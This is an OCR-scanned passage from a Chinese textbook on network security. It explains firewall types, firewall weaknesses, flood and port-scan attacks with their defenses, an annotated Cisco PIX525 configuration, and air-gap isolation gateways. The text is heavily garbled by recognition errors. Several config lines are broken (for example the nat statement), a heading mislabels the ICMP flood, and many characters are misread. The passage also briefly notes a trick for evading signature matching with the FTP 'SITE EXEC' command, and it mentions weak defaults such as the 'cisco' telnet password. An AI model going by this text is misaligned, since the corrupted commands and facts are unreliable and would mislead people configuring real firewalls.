由 器 都 提供 数据 包 过 滤 功 能 ,所 以 这 类 防火 墙 多 数 是 由 路 由 器 集成 的 ; 之 所 以 有 效 ,是 因为 
它 能 很 大 程度 上 满足 绝 大 多 数 用 户 的 安全 要 求 。 

在 整个 防火 墙 技术 的 发 展 过 程 中 , 包 过 滤 技 术 出 现 了 两 种 不 同 版 本 , 称 为 “第 一 代 静 态 
包 过 滤 ” 和 “第 二 代 动 态 包 过 滤 ”。 

第 一 代 静 态 包 过 滤 类 型 防火 墙 几乎 是 与 路 由 器 同时 产生 的 , 它 是 根据 定义 好 的 过 滤 规 
则 审查 每 个 数据 包 , 以 便 确定 其 是 否 与 某 一 条 包 过 滤 规 则 匹配 。 过 滤 规 则 基于 数据 包 的 报 
头 信息 进行 制订 。 报 头 信息 中 包括 IP 源 地 址 、IP 目标 地 址 \ 传 输 协议 (TCP、UDP、ICMP 
等 )、TCP/UDP 目标 端口 ICMP 消息 类 型 等 。 

第 二 代 动 态 包 过 滤 类 型 防火 墙 采用 动态 设置 包 过 滤 规 则 的 方法 ,避免 了 静态 包 过 滤 所 具 
有 的 问题 。 这 种 技术 后 来 发 展 成 为 包 状态 监测 (Stateful Inspection) 技 术 。 采 用 这 种 技术 的 防 
火 墙 对 通过 的 每 一 个 连接 都 进行 跟踪 ,并且 根据 需要 可 动态 地 在 过 滤 规 则 中 增加 或 更 新 条 目 。 

包 过 滤 方 式 的 优点 是 不 用 改动 客户 机 和 主机 上 的 应 用 程序 ,因为 它 工 作 在 网 络 层 和 传 
输 层 ,与 应 用 层 无 关 。 但 其 弱点 也 是 明显 的 ,过 滤 判别 的 依据 只 是 网 络 层 和 传输 层 的 有 限 信 
息 , 因 而 各 种 安全 要 求 不 可 能 充分 满足 ; 在 许多 过 滤器 中 ,过 滤 规 则 的 数目 是 有 限制 的 , 且 
随 着 规则 数目 的 增加 ,性 能 会 受到 很 大 的 影响 ; 由 于 缺少 上 下 文 关 联 信息 ,不 能 有 效 地 过 滤 
如 UDP、RPC 一 类 的 协议 ; 另外 ,大 多 数 过 滤器 中 缺少 审计 和 报警 机 制 , 它 只 能 依据 包头 信 
息 , 而 不 能 对 用 户 身 份 进行 验证 ,很 容易 受到 “地 址 欺骗 型 "攻击 ; 对 安全 管理 人 员 素 质 要 求 
高 ,建立 安全 规则 时 ,必须 对 协议 本 身 及 其 在 不 同 应 用 程序 中 的 作用 有 和 较 深入 的 理解 。 因 
此 ,过 滤器 通常 是 和 应 用 网 关 配 合 使 用 ,共同 组 成 防火 墙 系统 。 

2) 应 用 代理 (Application Proxy) 型 防火 墙 

应 用 代理 型 防火 墙 是 工作 在 OSI 的 最 高 层 , 即 应 用 层 。 其 特点 是 完全 “阻隔 ”了 网 络 通 
信 流 ,通过 对 每 种 应 用 服务 编制 专门 的 代理 程序 ,实现 监视 和 控制 应 用 层 通 信 流 的 作用 。 其 
典型 网 络 结构 如 图 14. 6 所 示 。 

在 代理 型 防火 墙 技术 的 发 展 过程 中 ., 它 也 经 历 了 两 个 不 同 的 版 本 , 即 第 一 代 应 用 网 关 型 
代理 防火 墙 和 第 二 代 自 适应 代理 防火 墙 。 

第 一 代 应 用 网 关 (Application Gateway) 型 防火 墙 是 通过 一 种 代理 (Proxy) 技 术 参 与 到 
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Real Server: 真实 服务 器 ,也 叫 服务 器 池 (Server Pool) ,是 负载 均衡 集群 中 真正 执行 客户 请 求 的 服务 器 。 
14.6 ”应 用 代理 型 防火 墙 


TCP 连接 的 全 过 程 。 从 内 部 发 出 的 数据 包 经 过 这 样 的 防火 墙 处 理 后 ,就 好 像 是 源 于 防火 墙 
外 部 网 卡 一 样 ,从 而 可 以 达到 隐藏 内 部 网 结构 的 作用 。 这 种 类 型 的 防火 墙 被 网 络 安全 专家 
和 媒体 公认 为 是 最 安全 的 防火 墙 。 它 的 核心 技术 就 是 代理 服务 器 技术 。 

第 二 代 自 适应 代理 (Adaptive Proxy) 型 防火 墙 是 近 几 年 才 得 到 广泛 应 用 的 一 种 新 防火 
墙 类 型 。 它 可 以 结合 代理 类 型 防火 墙 的 安全 性 和 包 过 滤 防 火 墙 的 高 速度 等 优点 ,在 毫 不 损 
失 安全 性 的 基础 之 上 将 代理 型 防火 墙 的 性 能 提高 十 倍 以 上 。 组 成 这 种 类 型 防火 墙 的 基本 要 素 
有 两 个 : 自 适应 代理 服务 器 (Adaptive Proxy Server) 与 动态 包 过 滤器 (Dynamic Packet Filter) 。 

在 “ 自 适 应 代理 服务 器 ”与 “动态 包 过 滤器 "之 间 存 在 一 个 控制 通道 。 在 对 防火 墙 进 行 配 
置 时 ,用 户 仅仅 将 所 需要 的 服务 类 型 .安全 级 别 等 信息 通过 相应 的 管理 界面 进行 设置 就 可 
以 。 然 后 , 自 适应 代理 就 可 以 根据 用 户 的 配置 信息 ,决定 是 使 用 代理 服务 从 应 用 层 代 理 请 
求 ,还 是 从 网 络 层 转发 包 。 如 果 是 后 者 , 它 将 动态 地 通知 包 过 滤器 增 减 过 滤 规 则 ,满足 用 户 
对 速度 和 安全 性 的 双重 要 求 。 

代理 类 型 防火 墙 的 最 突出 的 优点 就 是 安全 。 由 于 它 工作 于 最 高 层 ,所 以 它 可 以 对 网 络 
中 任何 一 层 数 据 通信 进 行 筛选 保护 ,而 不 是 像 包 过 滤 ,只 是 对 网 络 层 的 数据 进行 过 滤 。 

另外 代理 型 防火 墙 采取 的 是 一 种 代理 机 制 , 它 可 以 为 每 一 种 应 用 服务 建立 一 个 专门 的 
代理 ,所 以 内 、 外 部 网 络 之 间 的 通信 不 是 直接 的 ,而 都 需 先 经 过 代理 服务 器 审核 通过 后 再 由 
代理 服务 器 代为 连接 ,根本 没有 给 内 、 外 部 网 络 计算 机 任何 直接 会 话 的 机 会 ,从 而 避免 了 入 
侵 者 使 用 数据 驱动 类 型 的 攻击 方式 人 侵 内 部 网 。 

代理 防火 墙 的 最 大 缺点 就 是 速度 相对 比较 慢 , 当 用 户 对 内 、 外 部 网 络 网 关 的 吞吐 量 要 求 
比较 高 时 ,代理 防火 墙 就 会 成 为 内 、 外 部 网 络 之 间 的 瓶颈 。 

3) 入侵 状态 检测 防火 墙 (State Inspection Firewall) 

入 侵 状 态 检 测 防火 墙 也 叫 自 适应 防火 墙 或 动态 包 过 滤 防 火 墙 。 它 根据 过 去 的 通信 信息 
和 其 他 应 用 程序 获得 的 状态 信息 来 动态 生成 过 滤 规 则 ,根据 新 生成 的 过 滤 规 则 过 滤 新 的 通 
信 。 当 新 的 通信 结束 时 ,新 生成 的 过 滤 规 则 将 自动 从 规则 表 中 被 删除 。 

和信 侵 状态 检测 防火 墙 采用 协议 分 析 技 术 。 协 议 分 析 技 术 不 同 于 传统 的 基于 已 知 攻击 特 


征 的 模式 匹配 技术 ,而 是 一 种 智能 、 全 面 地 检查 网 络 通信 的 技术 。 它 能 够 知道 各 种 不 同 的 协 
议 是 如 何 工 作 的 ,并 且 能 全 面 分 析 这 些 协议 的 通信 情况 ,发 现 可 疑 或 异常 的 行为 。 对 于 每 个 
应 用 ,防火 墙 能 够 根据 RFC 和 工业 标准 来 验证 所 有 的 通信 行为 ,只 要 发 现 它 不 能 满足 期 望 
就 报警 。 它 分 析 网 络 行为 是 否 违反 了 标准 或 期 望 ,以 此 来 判断 是 否 会 危害 网 络 安全 ,因此 ， 
它 具 有 很 高 的 安全 性 。 如 很 多 攻击 都 用 到 的 FTP 命令 “SITE EXEC”, 它 用 来 执行 Shell 命 
令 。 若 使 用 特征 匹配 技术 , 它 仅 仅 进行 字符 串 的 完全 匹配 ,而 攻击 者 就 可 以 在 命令 SITE 与 
参数 EXEC 中 插 和 人 多余 的 空格 来 逃避 检查 。 而 协议 分 析 技 术 知道 如 何 去 分 析 这 个 命令 ,很 
容易 发 现存 在 的 攻击 。 因 此 协议 分 析 技 术 在 检查 攻击 的 性 能 上 比 传统 的 特征 匹配 技术 高 
得 多 。 

3. 从 防火 墙 结构 上 分 类 

防火 墙 可 分 为 单一 主机 防火 墙 路 由 器 集成 式 防火 墙 和 分 布 式 防火 墙 3 种 。 

(1) 单一 主机 防火 墙 是 最 传统 的 防火 墙 ,独立 于 其 他 网 络 设备 , 它 位 于 网 络 边 界 。 这 种 
防火 墙 其 实 与 一 台 计 算 机 结构 差不多 ,同样 包括 CPU、 内 存 、 主 板 、 磁 盘 等 基本 组 件 , 且 主 板 
上 也 有 南 .北桥 芯片 。 它 与 一 般 计算 机 最 主要 的 区 别 就 是 单一 主机 防火 墙 都 集成 了 两 个 以 
上 的 以 太 网 卡 , 因 为 它 需 要 连接 一 个 以 上 的 内 、 外 部 网 络 。 其 中 的 磁盘 就 是 用 来 存储 防火 墙 
所 用 的 基本 程序 ,如 包 过 滤 程 序 和 代理 服务 器 程序 等 ,有 的 防火 墙 还 把 日 志 记录 也 记录 在 此 
磁盘 上 。 

(2) 随 着 防火 墙 技术 的 发 展 及 应 用 需求 的 提高 ,单一 主机 的 防火 墙 现 在 已 发 生 了 许多 
变化 。 最 明显 的 变化 就 是 现在 许多 中 ,高 档 的 路 由 器 中 已 集成 了 防火 墙 功能 ,还 有 的 防火 墙 
已 不 再 是 一 个 独立 的 硬件 实体 ,而 是 由 多 个 软 、 硬 件 组 成 的 系统 ,这 种 防火 墙 ,俗称 "分 布 式 
防火 墙 ”。 

(3) 分 布 式 防火 墙 也 不 是 只 是 位 于 网 络 边界 ,而 是 渗透 于 网 络 的 每 一 台 主 机 ,对 整个 内 
部 网 络 的 主机 实施 保护 。 在 网 络 服务 器 中 ,通常 会 安装 一 个 用 于 防火 墙 系统 管理 软件 ,在 服 
务 器 及 各 主机 上 安装 有 集成 网 卡 功能 的 PCI 防火 墙 卡 ,这 样 一 块 防火 墙 卡 同时 兼 有 网 卡 和 
防火 墙 的 双重 功能 。 这 样 一 个 防火 墙 系统 就 可 以 彻底 保护 内 部 网 络 。 各 主机 把 任何 其 他 主 
机 发 送 的 通信 连接 都 视 为 “不 可 信 ” 的 ,都 需要 严格 过 滤 。 而 不 是 像 传统 边界 防火 墙 那样 , 仅 
对 外 部 网 络 发 出 的 通信 请 求 “ 不 信任 ”。 

4. 按 防火 墙 的 应 用 部 署 位 置 分 类 

防火 墙 可 以 分 为 边界 防火 墙 . 个 人 防火 墙 和 混合 防火 墙 3 大 类 。 

(1) 边界 防火 墙 是 最 传统 的 防火 墙 ,它们 位 于 内 、 外 部 网 络 的 边界 ,所 起 的 作用 是 对 内 、 
外 部 网 络 实施 隔离 ,保护 边界 内 部 网 络 。 这 类 防火 墙 一 般 都 是 硬件 类 型 的 ,价格 较 贵 ,性 能 
较 好 。 

(2) 个 人 防火 墙 安装 于 单 台 主 机 中 ,防护 的 也 只 是 单 台 主 机 。 这 类 防火 墙 应 用 于 广大 
的 个 人 用 户 ,通常 为 软件 防火 墙 ,价格 最 便宜 ,性 能 也 最 差 。 

(3) 混合 式 防火 墙 可 以 说 就 是 “分 布 式 防 火 墙 ? 或 者 “嵌入 式 防 火 墙 >, 它 是 一 整套 防火 
墙 系统 ,由 若干 个 软 、 硬 件 组 件 组 成 ,分 布 于 内 、 外 部 网 络 边界 和 内 部 各 主机 之 间 , 既 对 内 、 外 
部 网 络 之 间 通 信 进 行 过 滤 ,又 对 网 络 内 部 各 主机 间 的 通信 进行 过 滤 。 它 属于 最 新 的 防火 墙 
技术 之 一 ,性 能 最 好 ,价格 也 最 高 。 
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14.3.3 防火 墙 的 缺点 


防火 墙 具有 如 下 缺点 。 

1. 不 能 防范 恶意 知情 者 

防火 墙 可 以 禁止 系统 用 户 经 过 网 络 连 接 发 送 专 有 信息 ,但 用 户 可 以 将 数据 复制 到 其 他 
介质 中 带 出 去 。 如 果 入 侵 者 来 自 防火 墙 内 部 ,那么 防火 墙 就 无 能 为 力 了 。 内 部 用 户 可 以 破 
坏 防火 墙 体系 ,巧妙 地 修改 程序 从 而 避 过 防火 墙 。 对 于 来 自 知情 者 的 威胁 只 能 加 强 内 部 管 
理 , 对 用 户 进行 安全 教育 。 

2. 不 能 防范 不 通过 它 的 连接 

防火 墙 能 够 有 效 地 防止 通过 它 进行 传输 的 信息 ,然而 不 能 防止 不 通过 它 进行 传输 的 信 
息 。 如 果 站 点 允许 对 防火 墙 后 面 的 内 部 系统 进行 连接 ,那么 防火 墙 就 没有 办 法 阻止 人 侵 者 
进行 人 侵 行 为 。 

3. 不 能 防范 全 部 威胁 

防火 墙 被 用 来 防范 已 知 的 威胁 ,一 个 很 好 的 防火 墙 设 计 方案 可 以 防范 新 的 威胁 。 但 是 
没有 一 个 防火 墙 能 自动 防御 所 有 新 威胁 。 


14.4 防火 墙 设计 实例 


14.4.1 常见 攻击 方式 和 防火 墙 防御 


随 着 信息 技术 的 不 断 发 展 ,网 络 通信 已 成 为 日 常 办 公 不 可 缺少 的 组 成 部 分 。 在 此 前 提 
下 ,现在 的 网 络 攻击 行为 也 层出不穷 。 以 下 将 主要 介绍 几 种 常见 的 攻击 方式 以 及 防火 墙 所 
采用 的 防御 机 制 来 检测 并 避免 这 些 网 络 攻 击 行为 。 

1. SYN Attack (SYN 攻击 ) 

每 一 个 TCP 连接 的 建立 都 要 经 过 3 次 握手 的 过 程 : A 向 B 发 送 SYN 封包 ,B 用 SYN/ 
ACK 封包 进行 响应 ; 然后 A 又 用 ACK 封包 进行 响应 。 攻 击 者 用 伪造 的 IP 地 址 (不 存在 或 
不 可 到 达 的 地 址 ) 发 送 大 量 的 SYN 封包 至 防火 墙 的 某 一 接口 .防火墙 用 SYN/ACK 封包 对 
这 些 地 址 进行 响应 ,然后 等 待 响应 的 ACK 封包 。 因 为 SYN/ACK 封包 被 发 送 到 不 存在 或 
不 可 到 达 的 IP 地 址 ,所 以 它们 不 会 得 到 响应 并 最 终 超 时 。 当 网 络 中 充满 了 无 法 完成 的 连接 
请 求 SYN 封包 ,以 至 于 网 络 无 法 再 处 理 合法 的 连接 请 求 ,从 而 导致 拒绝 服务 (DoS) 时 ,就 发 
生 了 SYN 泛滥 攻击 。 防 火 墙 可 以 对 每 秒 钟 允许 通过 防火 墙 的 SYN 封包 数 加 以 限制 。 当 
达到 该 临界 值 时 ,防火 墙 开始 代理 进入 的 SYN 封包 ,为 主机 发 送 SYN/ACK 响应 并 将 未 完 
成 的 连接 存储 在 连接 队列 中 ,直到 连接 完成 或 请 求 超时 。 

2. ICMP Flood (UDP 泛滥 ) 

当 ICMP PING 产生 的 大 量 回 应 请 求 超出 了 系统 最 大 限度 ,以 至 于 系统 耗费 所 有 资源 
来 进行 响应 直至 再 也 无 法 处 理 有 效 的 网 络 信息 流 时 ,就 发 生 了 ICMP 泛滥 。 当 启用 ICMP 
泛滥 保护 功能 时 ,可 以 设置 一 个 临界 值 , 一 旦 超过 了 此 值 就 会 调用 ICMP 泛滥 攻击 保护 功能 
(默认 的 临界 值 为 一 般 设 为 每 秒 1000 个 封包 ) 。 如 果 超 过 了 该 临界 值 。 防 火 墙 在 该 秒 余 下 
的 时 间 和 下 一 秒 内 会 忽略 其 他 的 ICMP 回应 要 求 。 


3. UDP Flood (UDP 泛滥 ) 

与 ICMP 泛滥 相似 , 当 以 减 慢 系 统 速度 为 目的 向 该 点 发 送 UDP 封包 ,以 至 于 系统 再 也 
无 法 处 理 有 效 的 连接 时 ,就 发 生 了 UDP 泛滥 , 当 启 用 了 UDP 泛滥 保护 功能 时 ,可 以 设置 一 
个 临界 值 ,一 旦 超过 此 临界 值 就 启用 UDP 泛滥 攻击 保护 功能 (默认 的 临界 值 为 一 般 设 为 每 
秒 1000 个 封包 ) 。 如 果 从 一 个 或 多 个 源 向 单个 目标 发 送 的 UDP 泛滥 攻击 超过 了 此 临界 值 ， 
防火 墙 在 该 秒 余下 的 时 间 和 下 一 秒 内 会 忽略 其 他 到 该 目标 的 UDP 封包 。 

4. Port Scan Attack (端口 扫描 攻击 ) 

当 一 个 源 IP 地 址 在 定义 的 时 间 间 隔 内 (默认 值 一 般 为 5000ps) 向 位 于 相同 目标 IP 地 
址 10 个 不 同 的 端口 发 送 IP 封包 时 ,就 会 发 生 端口 扫描 攻击 。 这 个 方案 的 目的 是 扫描 可 用 
的 服务 ,希望 会 有 一 个 端口 响应 ,因此 识别 出 作为 目标 的 服务 。 防 火 墙 在 内 部 记录 从 某 一 远 
程 源 地 点 扫描 不 同 端口 的 数目 。 使 用 默认 设置 ,如 果 远 程 主机 在 0. 005s 内 扫描 了 10 个 端 
口 。 防 火 墙 会 将 这 一 情况 标记 为 端口 扫描 攻击 ,并 在 该 秒 余 下 的 时 间 内 拒绝 来 自 该 源 地 址 
的 其 他 封包 (不 论 目标 地 址 为 何 )。 


14.4.2 基于 PIX 系列 防火 墙 设计 实例 


PIX 是 CISCO 公司 开发 的 防火 墙 系列 设备 ,主要 起 到 策略 过 滤 ,隔离 内 外 网 ,根据 用 户 
实际 需求 设置 DMZ( 停 火 区 )。PIX 防火 墙 和 一 般 硬件 防火 墙 一 样 具 有 转发 数据 包 速 度 快 ， 
可 设 定 的 规则 种 类 多 ,配置 灵活 的 特点 。PIX 防火 墙 的 外 部 特征 如 图 14.7 所 示 。 


图 14.7 防火 墙 


一 台新 的 PIX 防火 墙 不 经 过 任何 配置 是 无 法 投入 使 用 的 。 需 要 用 CONSOLE 线 连 接 
设备 的 CONSOLE 口 并 根据 实际 应 用 环境 进行 设置 ,登录 PIX 的 管理 界面 很 简单 ,将 
CONSOLE 线 连接 控制 台 接口 即 可 ,如 图 14. 8 所 示 。 


计算 机 串口 
控制 台 接口 (DB-9/DB-25) 
(RJ-45) Rr 
一 一 RJ45 转 DB-9/DB-25 的 L 
串口 线 (无 效 调制 解 调 器 ) ”一 
二 


图 14.8 防火 墙 控制 台 接口 


防火 墙 通常 具有 至 少 3 个 接口 ,但 许多 早期 的 防火 墙 只 具有 2 个 接口 ; 当 使 用 具有 3 
个 接口 的 防火 墙 时 ,就 至 少 产生 了 3 个 网 络 ,3 个 网 络 的 基本 描述 如 下 : 


防火 桩 与 脱 溯 网 阅 


基于 案例 的 网 络 安 会 鞭 术 与 实践 


(1) 内 部 区 域 ( 内 网 ) ,内 部 区 域 通常 就 是 指 企业 内 部 网 络 或 者 是 企业 内 部 网 络 的 一 部 
分 。 它 是 互连网 络 的 信任 区 域 , 即 受 到 了 防火 墙 的 保护 。 

(2) 外 部 区 域 (外 网 ) ,外 部 区 域 通常 指 Internet 或 者 非 企 业内 部 网 络 。 它 是 互联 网 络 
中 不 被 信任 的 区 域 , 当 外 部 区 域 想 要 访问 内 部 区 域 的 主机 和 服务 时 ,通过 防火 墙 ,就 可 以 实 
现 有 限制 的 访问 。 

(3) 停火 区 (DM2) ,停火 区 是 一 个 隔离 的 网 络 或 几 个 网 络 。 位 于 停火 区 中 的 主机 或 服 
务 器 被 称 为 堡垒 主机 。 一 般 在 停火 区 内 可 以 放置 Web 服务 器 、Mail 服务 器 等 。 停 火 区 对 
于 外 部 用 户 通 常 是 可 以 访问 的 ,这 种 方式 让 外 部 用 户 可 以 访问 企业 的 公开 信息 ,但 却 不 允许 
他 们 访问 企业 内 部 网 络 。 

下 面 为 列 出 的 是 某 学 校 的 PIX525 配置 实例 ,并 为 关键 语句 给 出 了 详细 注释 。 


Welcome to the PIX firewall 

Type help or '?'fora list of available commands. 
PIX525 en 

Password: 

PIX525# sh config 

Saved 

PIX Version 6.0(1) 

//PIX 当前 的 操作 系统 版 本 为 6.0 

Nameif ethernet0 outside security0 

Nameif ethernetl inside security100 

// 显 示 目 前 pix 只 有 2 个 接口 

Enable password 7Y051HhCcoiRTSQZ encrypted 

Passed 7Y051HhCcoiRTSQZ encrypted 

//pix 防火 墙 密码 在 默认 状态 下 已 被 加 密 , 在 配置 文件 中 不 会 以 明文 显示 ,telnet 密码 默认 为 cisco 
Hostname PIX525 

// 主 机 名 称 为 PIX525 

Domain-name 123. com 

// 本 地 的 一 个 域名 服务 器 123. com, 通常 用 做 外 部 访问 
Fixup protocol ftp 21 

Fixup protocol http 80 

fixup protocol h323 1720 

fixup protocol rsh 514 

fixup protocol smtp 25 

fixup protocol sqlnet 1521 

fixup protocol sip 5060 

// 当 前 启用 的 一 些 服务 或 协议 ,注意 rsh 服务 是 不 能 改变 端口 号 
Names 

// 解 析 本 地 主机 名 到 ip 地 址 ,在 配置 中 可 以 用 名 字 代 蔡 ip 地 址 , 当前 没有 设置 ,所 以 列表 中 为 空 
pager lines 24 

// 每 24 行 一 分 页 

interface ethernet0 auto 

interface ethernetl auto 

// 设 置 两 个 网 卡 的 类 型 为 自 适应 

mtu outside 1500 

mtu inside 1500 

// 以 太 网 标准 的 MrU 长 度 为 1500 字 节 

ip address outside 61.144.51.42 255.255.255.248 


ip address inside 192.168.0.1 255.255.255.0 

//pix 外 网 的 认 地 址 61.144.51.42, 内 网 的 ip 地 址 192.168.0.1 

ip audit info action alarm 

ip audit attack action alarm 

//pix 人 侵 检测 的 2 个 命令 . 当 有 数据 包 具 有 攻击 或 报告 型 特征 码 时 ,pix 将 采取 报警 动作 (默认 动 
// 作 ), 向 指定 的 日 志 记录 主机 产生 系统 日 志 消息 ; 此 外 还 可 以 作出 丢弃 数据 包 和 发 出 tcp 连接 复位 信 
// 号 等 动作 , 需 另外 配置 

pdm history enable 

//PIX 设备 管理 器 可 以 图 形 化 的 监视 PIX 

arp timeout 14400 

//arp 表 的 超时 时 间 

global (outside) 1 61.144.51.46 

// 如 果 访 问 外 部 论坛 或 用 QQ 聊天 等 ,上 面 显示 的 ip 就 是 这 个 ,也 就 是 内 部 网 络 都 使 用 61.144. 51. 46 
// 这 个 IP 和 外 界 通信 

nat (inside) 10.0.0.00.0.0.000 

static (inside，outside) 61.144.51.43 192.168.0.8 netmask 255.255.255.255 0 0 

conduit permit icmp any any 

conduit permit tcp host 61.144.51.43 eq www any 

conduit permit udp host 61.144.51.43 eq domain any 

// 用 61.144.51.43 这 个 座 地 址 提供 domain-name 服务 ,而 且 只 允许 外 部 用 户 访问 domain 的 udp 
// 端 口 

route outside 0.0.0.0 0.0.0.0 61.144.51.61 1 

// 外 部 网 关 61.144. 51. 61 

timeout xlate 3:00:00 

// 某 个 内 部 设备 向 外 部 发 出 的 ip 包 经 过 翻译 (global) 后 ,在 默认 3 个 小 时 之 后 此 数据 包 若 没有 活 
// 动 ,此 前 创建 的 表 项 将 从 翻译 表 中 删除 ,释放 该 设备 占用 的 全 局 地 址 

timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 rpc 0:10:00 h323 0:05:00 sip 0:30:00 sip 
_media 0:02:00 

timeout uauth 0:05:00 absolute 

//AAA 认证 的 超时 时 间 ,absolute 表示 连续 运行 uauth 定时 器 ,用 户 超时 后 ,将 强制 重新 认证 
aaa-server TACACS + protocol tacacs + 

aaa-server RADIUS protocol radius 

//VaARR 服务 器 的 两 种 协议 .BAA 是 指认 证 ,授权 ,审计 .Pix 防火 墙 可 以 通过 AAA 服务 器 增加 内 部 网 络 的 
// 安 全 

no snmp-server location 

no snmp-server contact 

snmp-server community public 

// 由 于 没有 设置 snmp 工作 站 ,也 就 没有 snmp 工作 站 的 位 置 和 联系 人 

no snmp-server enable traps 

// 发 送 snmp 陷阱 

floodguard enable 

// 防 止 有 人 伪造 大 量 认 证 请 求 ,将 pix 的 AAA 资源 用 完 

no sysopt route dnat 

telnet timeout 5 

ssh timeout 5 

// 使 用 ssh 访 问 pix 的 超时 时 间 

terminal width 80 

Cryptochecksum:a9f03ba4ddb72elae6a543292dd4f5e7 

PIX525 井 

PIX525# write memory 

// 将 配置 保存 
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秦 于 案例 的 网 络 安全 技术 与 实践 


上 面 这 个 配置 实例 还 需要 如 下 说 明 : 该 pix 防火 墙 直接 摆 在 了 与 Internet 接口 处 ,此 处 
网 络 环境 有 十 几 个 公有 IP, 当 然 如 果 你 的 公司 公 网 IP 不 够 用 的 话 可 以 使 用 global 命令 强 
制 使 用 单一 IP 地 址 ,该 IP 地 址 和 外 部 接口 的 IP 地 址 相同 即 可 。 

在 实际 工作 中 可 以 使 用 show interface 查看 端口 状态 ,show static 查看 静态 地 址 映射 ， 
show ip 查看 接口 IP 地 址 ,ping outside|inside ip_address 确定 连通 性 。 这 些 都 是 在 故障 发 
生 后 调试 所 必须 执行 的 命令 。 


14.5 隔离 网 闸 概述 


我 国 2000 年 1 月 1 日 起 实施 的 4 计算 机 信息 系统 国际 联网 保密 管理 规定 》 第 二 章 第 六 
条 规定 :“ 涉 及 国家 秘密 的 计算 机 信息 系统 ,不 得 直接 或 间接 地 与 国际 互联 网 或 其 他 公共 信 
息 网 络 相连 接 ,必须 实行 物理 隔离 ”。 

物理 隔离 网 闸 最 早出 现在 美国 .以色列 等 国家 的 军 方 ,用 以 解决 涉 密 网 络 与 公共 网 络 连 
接 时 的 安全 。 在 电子 政务 建设 中 通常 会 遇 到 安全 域 的 问题 ,安全 域 是 以 信息 涉 密 程度 划分 
的 网 络 空间 。 涉 密 域 就 是 涉及 国家 秘密 的 网 络 空间 , 非 涉 密 域 就 是 不 涉及 国家 的 秘密 ,但 是 
涉及 本 单位 、 本 部 门 或 者 本 系统 的 工作 秘密 的 网 络 空间 。 公 共 服 务 域 是 指 不 涉及 国家 秘密 
也 不 涉及 工作 秘密 ,是 一 个 向 互联 网 络 完全 开放 的 公共 信息 交换 空间 。 国 家 有 关 文 件 就 严 
格 规定 ,政务 的 内 网 和 政务 的 外 网 要 实行 严格 的 物理 隔离 。 政 务 的 外 网 和 互联 网 络 要 实行 
逻辑 隔离 ,按照 安全 域 的 划分 ,政府 的 内 网 就 是 涉 密 域 ,政府 的 外 网 就 是 非 涉 密 域 ,互联 网 就 
是 公共 服务 域 。 通 过 安全 网 闸 , 把 内 网 和 外 网 联系 起 来 ,因此 网 闸 成 为 电子 政务 信息 系统 必 
须 配 置 的 设备 。 由 此 开始 ,网 闸 产 品 与 技术 正在 快速 兴起 ,成 为 我 国信 息 安 全 产业 发 展 的 一 
个 新 的 增长 点 。 

隔离 网 闸 是 在 保证 两 个 网 络 安全 隔离 的 基础 上 实现 安全 信息 交换 和 资源 共享 的 技术 。 
它 采 用 独特 的 硬件 设计 并 集成 多 种 软件 防护 策略 ,能 够 抵御 各 种 已 知 和 未 知 的 攻击 ,显著 提 
高 内 网 的 安全 强度 ,为 用 户 创造 安全 的 网 络 应 用 环境 。GAP 源 于 英文 的 Air Gap,GAP 技 
术 是 一 种 通过 专用 硬件 使 两 个 或 者 两 个 以 上 的 网 络 在 不 连通 的 情况 下 ,实现 安全 数据 传输 
和 资源 共享 的 技术 。GAP 中 文 名 字 叫 做 安全 隔离 网 闻 (SGAP) 。 


14.6 物理 隔离 网 闸 


14.6.1 物理 隔离 网 阅 定 义 


物理 隔离 网 疗 是 使 用 带 有 多 种 控制 功能 的 固态 开关 读 写 介质 连 接 两 个 独立 主机 系统 的 
信息 安全 设备 。 由 于 物理 隔离 网 闸 所 连接 的 两 个 独立 主机 系统 之 间 ,不 存在 通信 的 物理 连 
接 、 逻 辑 连接 、 信 息 传 输 命令 、 信 息 传输 协议 ,不 存在 依据 协议 的 信息 包 转 发 ,只 有 数据 文件 
的 无 协议 “摆渡 ”, 且 对 固态 存储 介质 只 有 * 读 ”和 "* 写 "两 个 命令 。 所 以 ,物理 隔离 网 闸 从 物理 
上 隔离 . 阻 断 了 具有 潜在 攻击 可 能 的 一 切 连接 ,使 “黑客 ?无 法 入 侵 、 无 法 攻击 ` 无 法 破坏 , 实 
现 了 真正 的 安全 。 


14.6.2 物理 隔离 的 技术 原理 


计算 机 网 络 依据 物理 连接 和 逻辑 连接 来 实现 不 同 网 络 之 间 、 不 同 主机 之 间 .主机 与 终端 
之 间 的 信息 交换 与 信息 共享 。 物 理 隔 离 网 闸 既 然 隔离 . 阻 断 了 网 络 的 所 有 连接 ,实际 上 就 是 
隔离 . 阻 断 了 网 络 的 连通 。 网 络 被 隔离 . 阻 断后 ,两 个 独立 主机 系统 之 间 如 何 进行 信息 交换 ? 
网 络 只 是 信息 交换 的 一 种 方式 ,而 不 是 信息 交换 方式 的 全 部 。 在 互联 网 时 代 以 前 ,信息 照样 
进行 交换 ,如 数据 文件 复制 (拷贝 数据 摆 渡 .数据 镜像 ,数据 反射 等 ,物理 隔离 网 闸 就 是 使 
用 数据 “摆渡 ”的 方式 实现 两 个 网 络 之 间 的 信息 交换 。 

网 络 的 外 部 主机 系统 通过 物理 隔离 网 闸 与 网 络 的 内 部 主机 系统 “连接 ”起 来 ,物理 隔离 
网 闸 将 外 部 主机 的 TCP/IP 协议 全 部 剥离 ,将 原始 数据 通过 存储 介质 ,以 “摆渡 ”的 方式 导入 
到 内 部 主机 系统 ,实现 信息 的 交换 。 物 理 隔 离 网 疗 在 任意 时 刻 只 能 与 一 个 网 络 的 主机 系统 
建立 非 TCP/IP 协议 的 数据 连接 , 即 当 它 与 外 部 网 络 的 主机 系统 相连 接 时 , 它 与 内 部 网 络 的 
主机 系统 必须 是 断 开 的 ,反之 亦 然 。 即 保证 内 、 外 网 络 不 能 同时 连接 在 物理 隔离 网 闸 上 。 物 
理 隔离 网 闸 的 原始 数据 “摆渡 "机制 是 原始 数据 通过 存储 介质 的 存储 ( 写 和 人 ) 和 转发 ( 读 出 ) 。 

物理 隔离 网 闸 在 网 络 的 第 七 层 将 数据 还 原 为 原始 数据 文件 ,然后 以 "摆渡 文件 ”的 形式 
来 传递 原始 数据 。 任 何 形式 的 数据 包 、 信 息 传输 命令 和 TCP/IP 协议 都 不 可 能 穿 透 物理 隔 
离 网 闻 。 这 同 透 明 桥 、 混 杂 模 式 IP over USB, 代 理 主机 以 及 通过 开关 方式 来 转发 信息 包 有 
